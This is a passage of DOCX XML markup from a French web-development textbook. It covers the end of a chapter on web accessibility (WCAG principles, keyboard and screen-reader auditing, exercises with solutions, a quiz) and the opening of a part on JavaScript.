                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Contrastes conformes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étiquettes de formulaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Navigation clavier complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Très élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sous-titres vidéo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2131"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen à élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Refonte d'un composant non accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Automatiser ce qui peut l'être, vérifier le reste à la main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Audit automatisé (ne détecte qu'une partie des problèmes)</w:t>
        <w:br/>
        <w:t>$ npx @axe-core/cli https://exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Audit manuel complémentaire</w:t>
        <w:br/>
        <w:t># 1. Parcourir toute la page au clavier</w:t>
        <w:br/>
        <w:t># 2. Désactiver les images</w:t>
        <w:br/>
        <w:t># 3. Tester avec un lecteur d'écran (NVDA, VoiceOver)</w:t>
        <w:br/>
        <w:t># 4. Zoomer à 200 %</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LES OUTILS AUTOMATIQUES NE VOIENT PAS TOUT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un audit automatique détecte environ 30 à 40 % des problèmes. Le reste exige un parcours réel au clavier et au lecteur d'écran. Ne confondez pas « zéro erreur dans l'outil » et « site accessible ».</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AUDIT EXPRESS EN DIX MINUTES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Tabuler dans toute la page : le focus est-il visible partout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Y a-t-il un lien d'évitement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Chaque image a-t-elle un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> justifié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Les contrastes sont-ils conformes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 zoom à 200 % conserve-t-il l'information ?</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Quatre principes WCAG : perceptible, utilisable, compréhensible, robuste.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AA est le niveau attendu ; A est le minimum vital.</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HTML natif résout la majorité des besoins, avant ARIA.</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Tout doit être utilisable au clavier, avec un focus visible.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nom accessible décrit l'action, pas l'icône.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erreurs se lient aux champs et s'annoncent.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audits automatiques couvrent moins de la moitié des problèmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La partie présentation est achevée. La suite entre dans le langage qui rend les pages vivantes : JavaScript.</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23.1 — Rendre un composant accessible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Ce bouton-icône n'a pas de nom et n'est pas utilisable au clavier.</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Ajoutez un nom accessible.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Préservez le focus.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Masquez l'icône aux technologies d'assistance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 23.2 — Auditer une page au clavier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   AUDIT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Parcourez une page réelle uniquement avec Tab, Maj+Tab, Entrée et Échap.</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Notez les points de blocage.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Vérifiez l'ordre de tabulation.</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Corrigez au moins trois problèmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 23.3 — Écrire des messages d'erreur accessibles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ACCESSIBILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois champs échouent à la validation. Rédigez et structurez le retour.</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Reliez chaque message à son champ.</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Annoncez le résumé des erreurs.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Indiquez comment corriger.</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23.1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&lt;button type="button" class="fermer" aria-label="Fermer la fenêtre"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;svg width="20" height="20" aria-hidden="true" focusable="false"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;use href="icones/croix.svg#croix"&gt;&lt;/use&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/svg&gt;</w:t>
        <w:br/>
        <w:t>&lt;/button&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;style&gt;</w:t>
        <w:br/>
        <w:t>.fermer:focus-visible { outline: 3px solid #e0a21b; outline-offset: 3px; }</w:t>
        <w:br/>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;button&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est activable par Entrée et Espace, et reçoit le focus naturellement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fournit le nom absent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-hidden="true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>focusable="false"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêchent l'icône SVG d'être annoncée ou focalisée dans les anciens navigateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 23.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Blocages fréquents : menus qui ne s'ouvrent pas, modales sans piège de focus, éléments non atteignables, focus invisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'ordre doit suivre la lecture : s'il saute à droite puis à gauche, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> positif ou un ordre visuel différent du DOM est en cause.</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Trois corrections rapides */</w:t>
        <w:br/>
        <w:t>:focus-visible { outline: 3px solid #e0a21b; outline-offset: 3px; }</w:t>
        <w:br/>
        <w:t>.skip-link:focus { position: static; }</w:t>
        <w:br/>
        <w:t>[role="dialog"] { isolation: isolate; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 23.3</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&lt;div role="alert" class="resume-erreurs"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;&lt;strong&gt;3 erreurs empêchent l'envoi :&lt;/strong&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;li&gt;&lt;a href="#courriel"&gt;L'adresse électronique doit contenir un</w:t>
        <w:br/>
        <w:t xml:space="preserve">      arobase.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t>&lt;li&gt;&lt;a href="#mdp"&gt;Le mot de passe doit comporter 12 caractères</w:t>
        <w:br/>
        <w:t xml:space="preserve">      minimum.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="#pays"&gt;Veuillez sélectionner un pays.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le résumé est annoncé immédiatement (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role="alert"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) et chaque lien conduit au champ fautif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque message dit ce qui est attendu, pas seulement ce qui est refusé : « doit contenir un arobase » est actionnable.</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Quels sont les quatre principes WCAG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Rapide, beau, simple, moderne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Perceptible, utilisable, compréhensible, robuste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Lisible, cliquable, imprimable, indexable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HTML, CSS, JS, ARIA</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Quel niveau de conformité est le standard attendu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A</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AA</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AAA</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Aucun</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 faire d'une icône purement décorative dans un bouton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 xml:space="preserve">La décrire dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alt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 xml:space="preserve">Ajouter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>aria-hidden="true"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La supprimer</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La rendre focusable</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 xml:space="preserve">Quel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tabindex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est recommandé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tabindex="5"</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tabindex="0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-1</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tabindex="1"</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Aucun, jamais</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Quelle proportion des problèmes un audit automatique détecte-t-il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100 %</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Environ 80 %</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Environ 30 à 40 %</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Moins de 5 %</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Ces quatre principes structurent tous les critères de conformité.</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AA est le niveau visé par la plupart des réglementations et des référentiels publics.</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L'icône n'apporte pas d'information : elle doit être ignorée par les technologies d'assistance, le nom venant du bouton.</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Les valeurs positives créent un ordre parallèle imprévisible ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont les seules valeurs raisonnables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les outils repèrent les erreurs mécaniques ; le reste exige un test manuel au clavier et au lecteur d'écran.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId42"/>
          <w:footerReference w:type="default" r:id="rId43"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE IV</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>JavaScript et interactivité</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Du langage aux interfaces réactives : DOM, événements, formulaires, asynchrone, stockage et état.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Introduction à JavaScript · 2. Fonctions, tableaux et objets · 3. Le DOM et la manipulation de la page · 4. Événements et interaction · 5. Formulaires et validation côté client · 6. Asynchrone : promesses et `async`/`await` · 7. Consommer une API web · 8. Stockage, état et persistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>24. Introduction à JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le langage du navigateur : où l'exécuter, comment l'inclure et ce qu'il peut — ou ne peut pas — faire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
